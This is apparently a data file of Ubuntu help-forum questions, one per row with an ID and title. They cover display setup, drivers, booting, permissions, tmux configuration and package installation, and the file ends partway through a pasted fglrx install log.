173076	trying to use 3 monitors with intel integrated graphics and separate video card	i am currently running ubuntu 12.04 lts on a desktop that has a intel i7 2600k with integrated intel hd 3000 graphics and a geforce gt430 1gb video card . i have 2 monitors ( in a vertical orientation ) connected through dvi to the gt430 card and one monitor ( in horizontal orientation ) connected to the dvi port on the motherboard . i can run the two vertical monitors without a problem , but i can not get the third monitor to work , past constantly displaying a ubuntu load screen . i have already set the intel integrated graphics to `` always enabled '' in bios , and have been playing around with the xorg.conf file for a while but can not seem to get it to work properly . here is the current copy of my xorg.conf file : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 295.33 ( buildd @ allspice ) fri mar 30 15:25:24 utc 2012 # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 295.49 ( buildmeister @ swio-display-x86-rhel47-07.nvidia.com ) tue may 1 00:54:24 pdt 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` dell 2408wfp '' horizsync 30.0 - 83.0 vertrefresh 56.0 - 76.0 option `` dpms '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor1 '' vendorname `` unknown '' modelname `` viewsonic va2231 series '' horizsync 24.0 - 82.0 vertrefresh 50.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 430 '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 430 '' option `` randrrotation '' `` on '' busid `` pci:1:0:0 '' screen 1 endsection section `` screen '' # removed option `` twinview '' `` 0 '' # removed option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+0 '' # removed option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+0 , dfp-1 : nvidia- auto-select +1920+0 '' # removed option `` metamodes '' `` gpu-0.dfp-0 : 1920x1200+0+0 , gpu-0.dfp-1 : 1920x1200+1920+0 , gpu-1.dfp-0 : 1920x1200+3840+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` randrrotation '' `` on '' option `` basemosaic '' `` true '' option `` twinview '' `` 1 '' option `` twinviewxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` dfp-0 : 1920x1200 +0+1200 , dfp-1 : 1920x1200 +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` dfp-1 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection does anyone know if what i am trying to do is possible given my setup ? and if so how can i get it to work ? any help would be appreciated and thank you in advance .
173082	how do i get rid of centurylink search in firefox ?	im using ubuntu 10 and the firefox 10.0 . when using the address bar to search , when i type long words like 'search this in google ' the search defaults to google . but when i type in small words like 'search ' the browser uses centurylink . please let me know how to get rid of this and make google as default search engine .
173084	ubuntu 12.04 system error/macchanger issue ?	specifics : ubuntu 12.04 gateway lt2800 series 1gb ram intel gma 3150 i just started getting a system error . i do n't know if it 's related to my issue with macchanger . but this is the issue i 'm most concerned with . i have written a short bash script to change my mac address . it looks about like this : ifconfig wlan0 down & & macchanger -a wlan0 & & ifconfig wlan0 up i always disable networking using the network manager before i execute the script . it 's located in my home folder . i run the script like this : sudo /scripts/changemac the terminal prints this after execution : permanent mac : xx : xx : xx : xx : xx : xx ( unknown ) current mac : xx : xx : xx : xx : xx : xx ( unknown ) new mac : 00 : e0:62 : f0:6c:56 ( host engineering ) ifconfig will affirm to me that my mac address has changed . then when i connect to an access point i get an error . when i run ifconfig afterwards it shows my original mac address . the error is /usr/share/apport/apport-gpu-error-intel.py and apport has detected a possible gpu hang . did your system recently lock up and/or require a hard reboot ? i would prefer to avoid a complete re-install . thanks . let me know what other information you might need to help me this .
173085	how do i build libcurl from source ?	i 've been trying to install libcurl from the git source . however when i cd into the repository and run ./configure i keep getting this error : [ ***** @ ****** bagder-curl-f0d611d ] $ ./configure -bash : ./configure : no such file or directory i did some googling . i 'm at work and i 'm not a system administrator , does that have anything to do with it ? i 'd rather not talk to our system administrator about this , as he is a rather unpleasant person who is typically not inclined to help . there does seem to be a configure file : $ ls acinclude.m4 cmakelists.txt git-info macosx-framework mkinstalldirs tests android.mk configure.ac include makefile packages todo-release buildconf copying install-sh makefile.am perl vc6curl.dsw buildconf.bat ctestconfig.cmake lib makefile.dist readme winbuild changes curl-config.in libcurl.pc.in makefile.msvc.names release-notes changes.0 curl-style.el log2changes.pl maketgz sample.emacs cmake docs m4 missing src
173086	out of disk , but still boots	i have a hp compaq nx6310 notebook wth 4gb memory & a new 250gb hdd . after installing ubuntu 12.04 , i got an `` out of disk '' error & was unable to boot . i rebooted in live , instaled & ran boot repair then rebooted . grub menu loaded fine , followed by `` out of disk ... ..press any key to continue '' . i pressed a key & ubuntu booted , a bit slow but still booted . so here are my questions : 1- since ubuntu does boot , should i just leave it alone ? 2- if i need to fix this , how do i do it ? 3- what causes this error ? $ wolf @ lpc-1 : ~ $ df -h filesystem size used avail use % mounted on /dev/sda1 230g 9.1g 209g 5 % / udev 1.6g 12k 1.6g 1 % /dev tmpfs 655m 868k 654m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.6g 260k 1.6g 1 % /run/shm wolf @ lpc-1 : ~ $
173088	what does `` ./configure ; make ; make install '' do ?	what does ./configure do ? why make then make install ? how does it know where libs are ? ( they are all there and loaded but it cant find them . ) why need libs if compiler is supposed to compile ?
173090	how to mount this image ?	i 'm trying to mount an image but i get some error : $ sudo mount -o loop matlab2011a_64.iso /cdrom/ [ sudo ] password for dev : mount : warning : /cdrom/ seems to be mounted read-only . i 'm not sure that i should mount it the cdrom or some other destination . can you tell me how i should mount the image ?
173094	how can i use ram storage for the /tmp directory and how to set a maximum amount of ram usage for it ?	after seeing the comment by anonymous on the question how is the /tmp directory cleaned up ? , i found that it would be a great idea to implement on my system , since i have 16gb of ram and i never used all of it . my temporary files never get written to the disk . they get written to a ram disk . i did put tmpfs /tmp tmpfs defaults , noatime , mode=1777 0 0 in /etc/fstab . my question is : can i set a maximum value for ram usage for /tmp ? and in that case , what would happen if the maximum amount got exceeded , would it write into the hard-disk drive ? i have read this solution which states : mkdir -p /tmp/ram sudo mount -t tmpfs -o size=512m tmpfs /tmp/ram/ but in my understanding , this wo n't be a permanent solution . if i need it to be permanent , it has to be added to the /etc/fstab configuration file . if this is the correct solution , how can i transform that mount command into a line in /etc/fstab ?
173095	how do i work around this installation error ?	it 's happening when i try to install matlab : $ ./install preparing installation files ... installing ... ./install : 1 : eval : /tmp/mathworks_21238/java/jre/glnxa64/jre/bin/java : permission denied finished and even when i make sudo : $ sudo ./install [ sudo ] password for dev : preparing installation files ... installing ... ./install : 1 : eval : /tmp/mathworks_22032/java/jre/glnxa64/jre/bin/java : permission denied finished
173104	ca n't boot ubuntu 64bit	i downloaded ubuntu 64bit and installed it from a cd . everything went fine the partitions were correct but when i start my computer there is no option for i have a system of 8gb ram , gtx 670 and i5 3570 . i also have a durable mothereboard . i want to choose between the ubuntu and windows before booting . i know that the bios can help and maybe you have to tell it where to search to boot . but i do n't know of this stuff and i want details how to do it .
173107	how to speed up installation ?	i have an acer 4736z with 2gb ram and ubuntu 12.04 is running too slow for my standards . i would like to know if i am running useless processes that i am not aware of and remove packages i will never use . how can i do that ? free -m output : total used free shared buffers cached mem : 1944 1627 316 0 15 340 -/+ buffers/cache : 1271 673 swap : 1976 676 1300
173112	what is the maas node login ?	i have a problem , when i want to login in nodes . my nodes are created via maas dashboard , where i 'm adding nodes . but when installation completes i 'm asking to login and password to get into the node . but they was n't shown or i missing something . i need to login to nodes to check clock and solve other issues .
173114	how can i log in to a hidden user ?	after some research , i found that you can make specific users hidden by using terminal and changing their id to below 1000 . i 've done this for one of my users but now i ca n't login to that account . my login screen consists of user1 and guest . there 's no place for me to input the username and password of the hidden account . i know it 's possible to make the log in ask for the username and password every time but that 's not what i 'm looking for . instead , i want user1 and other to be in the login screen . is there any way of doing this ? i 'm running ubuntu 12.04 . thanks in advance !
173118	ca n't start gparted on a live cd	i ca n't run gparted on the live cd because something called root must run it and i do n't have the necessary privileges .
173122	may i install quickly also on kubuntu ?	i have installed kubuntu . now i would develop applications for ubuntu with quickly ; have i to uninstall kubuntu and install ubuntu or there 's a way to mantain kubuntu ?
173131	how do i install ironpython ?	i tried installing ironpython on ubuntu 12.04 using the guide here : ironpython on mono but it does n't seem to work . i have no solutions/ironpython.mono.sln , so i try to xbuild solutions/ironpython.sln but it does n't work because of some errors . can someone please point to another way of installing ironpython on ubuntu ? thanks !
173133	selecting ubuntu 12.04 restarts my hp 540 laptop	every time i select ubuntu 12.04 when booting my hp 540 laptop , the machine restarts . how can i fix this , so i can successfully boot my ubuntu system ?
173134	using bumblebee with wine erro	i 've been trying to run a windows program with wine using optirun . however when i do : sudo optirun wine program_name.exe i get the following output : wine : /home/username/.wine is not owned by you why wo n't it run ? thank you .
173144	i have my usb fully set up . now what ?	after my computer restarted while upgrading through update manager ( yes , i followed every troubleshoot i could find ) , i have decided to screw it and just start fresh . i downloaded the iso , and i 've mounted it to my usb . everything is ready . but now i am realizing i have no idea what to do ? does it wipe my hard drive ? can i get it to wipe my hard drive ? will it override my old version ? will it get bogged down because of my old version ? i have no idea what to do now . please help !
173145	problem with dual-view	i 've just installed 12.04 lts on my old ibm thinkpad r51 and i connected samsung syncmaster 21.5 '' monitor via vga port . i 've tried to do dual-view , but when i try to set a resolution on a monitor , which is bigger then laptop 's resolution , i got an error : the selected configuration for displays could not be applied . requested position/size for crtc 63 is outside the allowed limit : position= ( 1024 , 0 ) , size= ( 1920 , 1080 ) , maximum= ( 2048 , 2048 ) . when i try to launch nvidia-settings , it says : you do not appear to be using the nvidia x server . i 've tried to install newest nvidia drivers etc . but that did n't help . what should i do , to use 1920x1080 resolution ?
173151	what does the tilde at the end of a file name stand for ?	in windows , i believe that files with a tilde in the file name represent files that are currently open in an application . for example , microsoft word creates a file with almost the same name as the file you currently have open , but with a tilde in the name . it 's icon is also partially faded . as far as i 'm aware , this signifies a temporary file that exists in case the application crashes and you did n't get a chance to save your file , or to allow the original file to remain unlocked by the file system and accessible to other applications . in linux , i ran into a *.log file with a tilde at the end of the file name ( scan.log~ ) . does that mean the log file is currently open in another application that is potentially writing to it ?
173155	ca n't boot -- > pxe-m0f : exiting intel pxe rom	question : i recently installed xen ( paravirtualization ) on my ubuntu 12.04 machine . ubuntu 12.04 worked excellently before , but afterwards , the trouble started . the laptop crashed every time i closed down the screen . unsurprisingly , that resulted in file-system corruption . though the real trouble did not start until fsck complained about corruption and `` repaired '' it ( i tried to abort it right away , but to no avail , ubuntu would n't let me continue until i ran that damn more-trouble-than-worth program ... ) . the system run fine after a second restart ( on the first restart , after some time , the file system switched to read-only for whatever reason ... ) i afterward installed dist-upgrade ( 250 mb ) , to try to mitigate any trouble caused by corruption . i restarted , it still worked fine . i compiled bind9 , latest version , compiling takes 15+ minutes , so i went to eat , meanwhile the laptop went into standby ... when i came back and tried to wake it , the screen remained black . closing and opening the screen did n't help . as usual on the xen kernel . so i switched off power , and on reboot , got the error message i am still fighting with right now : intel undi , pxe-2.0 ( build 083 ) copyright ( c ) 1997 - 2000 intel corporation for atheros pcie ethernet controller v2.0.2.3 ( 05/18/10 ) check cable connection ! pxe-m0f : exiting intel pxe rom . no bootable device -- insert boot disk and press any key the funny thing is , pxe netboot is not enabled in my bios , so i should n't see this message . also , the bios boot-sequence is 1 . usb stick - 2 . harddrive - 3 . cd/dvd - 4 . network i tried booting via the ubuntu live cd on a usb stick , and with that , i could access the data on my harddrive , everything seems to still be there . i ran the boot-repair tool , as recommended here https : //help.ubuntu.com/community/boot-repair but that did n't help . i still get the same error message on boot . the good news is , the data seems to still be there ... here is my boot-repair paste : http : //paste.ubuntu.com/1134895/ and that 's it . anybody knows what i can do , short of copying down the data and reinstalling ? to me it seems like xen is in some strange boot state from the stand-by , and now tries to boot of pxe , which of course does n't work , since there is nothing - fortunately .
173157	i want to disable the key trigger that makes alt invoke the search prompt	i use the alt key a lot in combination with other commands , and i find myself accidently invoking the `` type your command '' prompt too often . how can i prevent alt from ever triggering that ?
173162	unable to mount drive1 - not authorized	i 'm using ubuntu server 12.04 on my hp proliant microserver . i am using webmin/vnc/ssh to administer it . i 'm trying to mount a drive which i had previously used on the same kit but with openmediavault . in omv i had formatted the disk as xfs . when i try to access the disk in ubuntu i get : unable to mount drive1 - not authorized i 've tried mounting the disk in webmin but it has no option for xfs . i 'm quite new to linux so can anyone assist me ?
173172	how do i install ubuntu as a shell to learn how to program in it ?	how do i install ubuntu as a shell to learn how to program in it ? i dont wish to drop windows just yet and i can not afford a 2nd computer is there a way to do it like the old `` dos shell '' ?
173174	tmux key binding issue	i 've switched from using screen a while back to using tmux . i have a tmux config which uses screen 's ctrl+a sequence , instead of tmux 's default ctrl+b . however , one issue i 've found is that if i press ctrl-a and then hit p for the previous screen , or n for the next screen , without releasing the ctrl key , tmux ignores the key sequence . if i press ctrl+a , release the ctrl , and then press n or p , it works fine . any thoughts on what might be wrong ? my config is as follows : # $ id : t-williams.conf , v 1.1 2009/11/02 18:59:28 nicm exp $ # # ~/.tmux.conf - tmux terminal multiplexer config # thayer williams ( http : //cinderwick.ca ) # `` feel free to do whatever you like with it . '' # set prefix key to ctrl+a unbind c-b set -g prefix c-a # send the prefix to client inside window ( ala nested sessions ) bind-key a send-prefix # toggle last window like screen bind-key c-a last-window # confirm before killing a window or the server bind-key k confirm kill-window bind-key k confirm kill-server # toggle statusbar bind-key b set-option status # ctrl+left/right cycles thru windows bind-key -n c-right next bind-key -n c-left prev # open a man page in new window bind / command-prompt `` split-window 'exec man % % ' '' # switch split window keys unbind % bind | split-window -h bind - split-window -v # quick view of processes bind '~ ' split-window `` exec htop '' # scrollback buffer n lines set -g history-limit 10000 # listen for activity on all windows # set -g bell-action any setw -g monitor-activity off set -g visual-activity off # on-screen time for display-panes in ms set -g display-panes-time 2000 # start window indexing at one instead of zero set -g base-index 1 # enable wm window titles set -g set-titles on # automatically set window title setw -g automatic-rename # statusbar -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- set -g display-time 2000 # default statusbar colors set -g status-fg white set -g status-bg cyan set -g status-attr default # default window title colors set-window-option -g window-status-fg black set-window-option -g window-status-bg cyan set-window-option -g window-status-attr default # active window title colors set-window-option -g window-status-current-fg white set-window-option -g window-status-current-bg black set-window-option -g window-status-current-attr bright # command/message line colors set -g message-fg blue set -g message-bg white set -g message-attr dim # center align the window list set -g status-justify centre # show some useful set -g status-left `` [ # [ fg=black ] # h # ( uptime | cut -d ' , ' -f 3- | sed -e 's/ load average : // ' | sed -e 's/ / /g ' ) # [ default ] ] '' set -g status-left-length 50 set -g status-right `` [ # [ fg=black ] % a % y- % m- % d % h : % m # [ default ] ] '' set -g status-right-length 50 set -g default-terminal `` screen ''
173186	syncing two laptops without data loss	i 've got two laptops which i want to keep as similar as possible and do backups on them . what should i use just to have all files from one laptop on the other ? how can i avoid data loss when i use both laptops ? for example changing firefox history on both laptops without syncing ? as far as i know , rsync etc . would discard changes of the older one , making syncing essential . i do n't want to use the cloud for obvious reasons .
173187	when i have an interrupted boot process , it shows a text-based xubuntu splash screen . how can i change this ?	a while ago when booting up ubuntu 12.04 i had accidentally turned off my computer . it showed the grub screen and instead of the normal ubuntu boot-up screen , it showed what was looking like a text version of the plymouth boot-up screen , except it said xubuntu 12.04 instead of ubuntu 12.04 and it had a black background . when booting up normally without interruptions , it shows the purple ubuntu boot-up screen , like it should . i am wondering why it would show a different 'text-based ' xubuntu splash screen when i accidentally powered off mid-boot , as opposed to the normal ubuntu splash screen that it shows when there are no interruptions . i have installed xubuntu-desktop once , but it 's weird that it shows a different splash screen than normal . is there any way to change that back to normal or make it say ubuntu 12.04 ?
173191	how do i wrest ownership from root or get administrator privileges ?	i have been using windows since win 3.11 and have only been on linux/ubuntu for about three hours . i know things are done differently on linux and i do not expect it to be as intuitive and user-friendly as windows , so i am prepared for a few bumps on the road . the first thing i do when moving to a new windows version is to install a disk imaging software , because i always manage to screw something up when familiarizing myself with a new os and then it is nice to be able to reinstall the system in a matter of minutes rather than hours . that is also the reason why i am always very particular about keeping os and my documents and data separated on two different partitions . i have installed ubuntu 64bit on a dedicated hdd with an 8gb swap partition , a 20gb / partition and the rest allocated to a partition i named /d-drive for documents , data and disk images . after installation , i installed an application called partition image from the software center and then i hit a brick wall ! the problem is that i can not access my d-drive , because for some reason that belongs to root and i can not run partition image , because for some reason it also belongs to root ( i did not download it as root ) . in windows 7 , i would just right-click and 'run as administrator ' or give my user account administrator privileges , but i have not been able to figure out how to do either in ubuntu . how do i get around this annoying root issue and take ownership of my pc ? can i give my user account root rights or can i take over the root account as my primary login ? please remember that i do not know anything about linux yet , so i need a step-by-step description .
173195	how do i remove a ppa added via command-line ?	i added a ppa for updating my kernel for ubuntu-12.04 . later , i found that the kernel doesnot exist on the link within ppa . i used this command . sudo add-apt-repository ppa : kernel-ppa/ppa now if i try sudo apt-get update , i get an error 404 , because http : //ppa.launchpad.net/kernel-ppa/ppa/ubuntu/dists/precise/main/source/sources , does not exist . trouble is i am unable to do an update . even not able to do sudo ppa-purge ppa : kernel-ppa/ppa suggest a solution .
173197	download issue with software center	ok so i just got xfinity setup at my house and i seem to be having trouble downloading from the software center . all it comes up with is this : failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/s/samba/libwbclient0_3.5.11~dfsg-1ubuntu2.2_i386.deb 404 not found [ ip : 91.189.92.166 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.5.11~dfsg-1ubuntu2.2_i386.deb 404 not found [ ip : 91.189.92.166 80 ] can you help ?
173203	why is n't vlc the default video player ?	why does ubuntu come with totem set as default ? is there a reason or am i just wrongly assuming everybody thinks totem is actually inferior to vlc ? not to mention vlc is vastly known as perhaps the best video player for windows , which would help with a smoother transition to windows users making the switch .
173206	how do i install drivers for the panasonic mb1900cx all-in-one printer/scanner ?	i bought a new panasonic printer/scanner/copier , i am going to to install it , but ubuntu cant find it`s driver ! i find a driver in panasonic website but it is 32bit and can not run in my laptop ! ( my laptop is 64bit ! 32bit driver : http : //panasonic.net/pcc/support/fax/common/table/linuxdriver.html i have installed ia32-libs but it shows same error , the package is build for i686 cpu , can not install to x86_64 system how can i solve this problem ?
173212	unity web apps not working with gmail	i 'm on 12.04 32bit using chromium . i installed unity web apps preview . when i go to gmail i do not get a webapps prompt in chromium . i 'm also having this issue with other sites like facebook . it does work fine for other sites like youtube , launchpad and google calendar . i would like to get it working at least for gmail since it 's all i would really use this for .
173213	how to make fluxbox stop making annoying sound effects ?	whenever i open a new tab in chrome , or pretty much interact with the ui in any way , fluxbox makes some very annoying sound effects . where can i disable that ?
173215	how do i add my network drive to wine to use applications from there ?	i am a new wine user . i have a windows pc that is sharing files to my linux machine . i can see the stuff that i shared from my network directory but in wine i want to be able to use those exe 's that are on the share with wine . there 's no option in wine to map network drives but i 'm not entirely too clear on how to go about using that . so , how do i add my network drive to wine to use applications from there ?
173219	can i execute an application built with quickly ( python - pygtk ) on ms windows ?	i am working with quickly , using python and pygtk . i know there is an option for packaging ; so i can create a .deb file . this is for ubuntu . i was reading about pygtk and it seems that pygtk runs on ms windows too . so , can i execute an app built with quickly on ms windows ? if so , how ? which is the file ( .py ) that i have to execute on ms windows ? ( a quickly project has many .py files ) thanks . ariel
173220	how do i change the font or the font size in the tty ( console ) ?	i am using ubuntu 12.04 . recently , the font size for all of my ttys became much larger . how can i change the font size back to the default ?
173227	no internet connection on 12.04	i recently installed ubuntu 12.04 on my old dell inspiron 1720 laptop . everything works fine , except that it simply can not connect to the internet . it appears that even when i plug in the ethernet cable , no internet connection can be established . wireless does not work either . all that i can tell you right now is that my network card is a broadcom bcm4311 . if you need any more information , i will try to answer as best as i can using the terminal . just know that i am new to ubuntu ! thank you !
173229	why did my canon or epson printer stop working after a recent update on 12.04 ?	i have a canon ( or epson ) printer and use ubuntu 12.04 . it looks like my printer has partially stopped working after a recent update -- only half of the last page is printed out ( sometimes this happens with all pages ) . is there a way to fix it ?
173233	virtual machine hangs when i use ubuntu	i 'm using 10.04 using vmware player . the virtual machine is very very slow and is hanging often . i have to force shutdown the system whenever it hangs . mine is a dell laptop with 4gb ram i3 processor and 2.40ghz frequency . i 'm not sure if it is a problem with my processor . i could have comfortably used ubuntu even if it is a bit slow . but the terminal and everything hangs . let me know when someone face the same problem with a solution .
173242	opening an application via terminal	i am a new user of precise pangolin and learning to use the terminal . i just wonder whether there is any easy command/combination of commands to open an application ( libreoffice writer , for example ) via terminal , just like we use sudo apt-get install < < packagename > > to install an application .
173247	wireless not working ubuntu 12.04 new computer	i just bought a laptop from cyberpower pc company and opted out of spending $ 39 for them to install windows 8 . i just booted precise pangolin from a flash drive and installed it on my computer . everything works fine except for the wireless capabilities . i have looked at several of the posts on the forum and have n't been able to ascertain the solution to my problem . i know that the wireless network card is from atheros and that 's about it . when i tried the iwconfig command and this is what came up and this is what resulted : $ sudo iwconfig lo no wireless extensions eth0 no wireless extensions i also tried installing the ath9k driver and the atl1c driver as shown in this post on the boards : ethernet conection not working atheros ar8152 os 12.04 it seems that neither of the drivers have worked and i 'm not sure exactly what to do . the above post is old and is using an one of the older versions of the compat ... tar.bz2 file than the most current one on the website . i am very new to ubuntu so i am rather lost at what i should be doing next . i have no idea why the post worked for the other users and not for myself or if i should be attacking this problem from an entirely different perspective . also , i 'm not sure what model my atheros card is or how that can be found . any help is greatly appreciated .
173248	where is the bootloader stored - in rom , ram , or elsewhere ?	according to the wikipedia entry , a bootloader is a small program stored in rom ( a part of the main memory ( ram ) , is n't it ? ? ) which can only be read and not erased . i am a little puzzled here . does this mean that every ram we buy has a bootloader installed by default ? and also , i read from a book which says that there is typically an area called the mbr ( master boot record ) on the hard drive which includes a bootloader ... so where exactly is this bootloader located ? do different operating systems store their bootloader in different places ?
173256	ca n't install python-distutils-extra from source in ubuntu	im new to linux but i like it more than windows . im trying to install keryx to download update packages for my laptop which i install ubuntu on it yesterday . but while install the setup.py . terminal gives a url which it says that i should install it . but the problem when installing it was : skadush @ ubuntu : ~/python-distutils-extra-2.35 $ python setup.py traceback ( most recent call last ) : file `` setup.py '' , line 3 , in < module > from setuptools import setup importerror : no module named setuptools skadush @ ubuntu : ~/python-distutils-extra-2.35 $ what does it mean ?
173257	installed windows8 and now my grub is gone , help ?	so i installed windows 8 on a newly created partition on disk0 . before this i had a dual boot with windows 7 , and ubuntu 12.04 . after the installation of win8 , i no longer see the boot loader , grub appear . i get the normal windows boot option which only gives me the following , win7 , and win8 ... uughh ! ! i tried re-installing ubuntu but still nothing . is there anyway to get ubuntu back on my machine without destroying my windows installation , or win8 for that matter . also note , windows does n't recognize my other disk as i left disk1 completely for ubuntu . the only time i can see this is in disk manager obviously within windows . when i load ubuntu from a livecd , i can see it ... very annoying , starting to hate windows8..
173258	error installing fglrx driver	my computer uses a radeon hd 6950 . i installed the `` ati/amd proprietary fglrx graphics driver '' just fine , however , when i tried to install the `` post-release updates '' , i received an error ( `` sorry , installation of this driver failed . '' ) the log dump : 2012-08-07 20:46:12,739 debug : fglrx_updates is not the alternative in use 2012-08-07 20:46:17,150 debug : installing package : fglrx-updates 2012-08-07 20:46:17,459 debug : install progress dpkg-exec 0.000000 2012-08-07 20:46:17,650 debug : install progress fglrx-amdcccle 0.000000 2012-08-07 20:46:17,718 debug : install progress fglrx-amdcccle 6.250000 2012-08-07 20:46:17,718 debug : install progress fglrx-amdcccle 12.500000 2012-08-07 20:46:17,840 debug : install progress fglrx-amdcccle 18.750000 2012-08-07 20:46:18,387 debug : install progress fglrx 18.750000 2012-08-07 20:46:18,488 debug : install progress fglrx 25.000000 2012-08-07 20:46:22,242 debug : install progress fglrx 31.250000 2012-08-07 20:46:22,899 debug : install progress fglrx 37.500000 2012-08-07 20:46:23,034 debug : install progress bamfdaemon 37.500000 2012-08-07 20:46:23,186 debug : install progress ureadahead 37.500000 2012-08-07 20:46:23,337 debug : install progress initramfs-tools 37.500000 2012-08-07 20:46:31,330 debug : install progress libc-bin 37.500000 2012-08-07 20:46:31,696 debug : install progress dpkg-exec 37.500000 2012-08-07 20:46:32,196 debug : install progress fglrx-updates 37.500000 2012-08-07 20:46:32,297 debug : install progress fglrx-updates 43.750000 2012-08-07 20:46:35,565 debug : install progress fglrx-updates 50.000000 2012-08-07 20:46:35,715 debug : install progress fglrx-updates 56.250000 2012-08-07 20:46:35,993 debug : install progress fglrx-amdcccle-updates 56.250000 2012-08-07 20:46:36,093 debug : install progress fglrx-amdcccle-updates 62.500000 2012-08-07 20:46:36,589 debug : install progress fglrx-amdcccle-updates 68.750000 2012-08-07 20:46:36,679 debug : install progress fglrx-amdcccle-updates 75.000000 2012-08-07 20:46:36,775 debug : install progress ureadahead 75.000000 2012-08-07 20:46:37,096 debug : install progress dpkg-exec 75.000000 2012-08-07 20:46:37,117 debug : install progress fglrx-updates 75.000000 2012-08-07 20:46:37,457 debug : install progress fglrx-updates 81.250000 2012-08-07 20:46:50,763 debug : install progress fglrx-updates 87.500000 2012-08-07 20:46:51,118 debug : install progress bamfdaemon 87.500000 2012-08-07 20:46:51,279 debug : install progress fglrx-amdcccle-updates 87.500000 2012-08-07 20:46:51,346 debug : install progress fglrx-amdcccle-updates 93.750000 2012-08-07 20:46:51,414 debug : install progress fglrx-amdcccle-updates 100.000000 2012-08-07 20:46:51,490 debug : install progress initramfs-tools 100.000000 2012-08-07 20:46:58,956 debug : install progress libc-bin 100.000000 2012-08-07 20:47:00,259 debug : ( reading database ... 176892 files and directories currently installed . ) removing fglrx-amdcccle ... removing fglrx ... removing all dkms modules done . update-alternatives : removing manually selected alternative - switching i386-linux-gnu_gl_conf to auto mode update-alternatives : using /usr/lib/pxpress/ld.so.conf to provide /etc/ld.so.conf.d/i386-linux-gnu_gl.conf ( i386-linux-gnu_gl_conf ) in auto mode . update-alternatives : warning : skip creation of /usr/bin/amdcccle because associated file /usr/lib/fglrx/bin/amdcccle ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : skip creation of /usr/share/applications/ubuntu-amdcccle.desktop because associated file /usr/share/fglrx/amdcccle.desktop ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : skip creation of /usr/share/applications/ubuntu-amdccclesu.desktop because associated file /usr/share/fglrx/amdccclesu.desktop ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : skip creation of /etc/opencl/vendors/amdocl64.icd because associated file /usr/lib/fglrx/etc/opencl/vendors/amdocl64.icd ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : skip creation of /usr/bin/amdupdaterandrconfig because associated file /usr/lib/fglrx/bin/amdupdaterandrconfig ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : skip creation of /usr/bin/amdxdg-su because associated file /usr/lib/fglrx/bin/amdxdg-su ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : skip creation of /usr/lib32/libaticalcl.so because associated file /usr/lib32/fglrx/libaticalcl.so ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : skip creation of /usr/lib32/libaticalrt.so because associated file /usr/lib32/fglrx/libaticalrt.so ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : not replacing /usr/lib/i386-linux-gnu/xorg/extra-modules with a link . update-alternatives : removing manually selected alternative - switching x86_64-linux-gnu_gl_conf to auto mode update-alternatives : using /usr/lib/pxpress/alt_ld.so.conf to provide /etc/ld.so.conf.d/x86_64-linux-gnu_gl.conf ( x86_64-linux-gnu_gl_conf ) in auto mode . update-alternatives : using /usr/lib/i386-linux-gnu/mesa/ld.so.conf to provide /etc/ld.so.conf.d/i386-linux-gnu_gl.conf ( i386-linux-gnu_gl_conf ) in auto mode . update-alternatives : warning : not replacing /usr/lib/i386-linux-gnu/xorg/extra-modules with a link . update-initramfs : deferring update ( trigger activated ) processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for ureadahead ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-27-generic-pae processing triggers for libc-bin ... ldconfig deferred processing now taking place selecting previously unselected package fglrx-updates . ( reading database ... 176654 files and directories currently installed . ) unpacking fglrx-updates ( from ... /fglrx-updates_2 % 3a8.960-0ubuntu1_i386.deb ) ... selecting previously unselected package fglrx-amdcccle-updates . unpacking fglrx-amdcccle-updates ( from ... /fglrx-amdcccle-updates_2 % 3a8.960-0ubuntu1_i386.deb ) ... processing triggers for ureadahead ... setting up fglrx-updates ( 2:8.960-0ubuntu1 ) ... update-alternatives : using /usr/lib/fglrx/ld.so.conf to provide /etc/ld.so.conf.d/i386-linux-gnu_gl.conf ( i386-linux-gnu_gl_conf ) in auto mode . update-alternatives : warning : skip creation of /etc/opencl/vendors/amdocl64.icd because associated file /usr/lib/fglrx/etc/opencl/vendors/amdocl64.icd ( of link group i386-linux-gnu_gl_conf 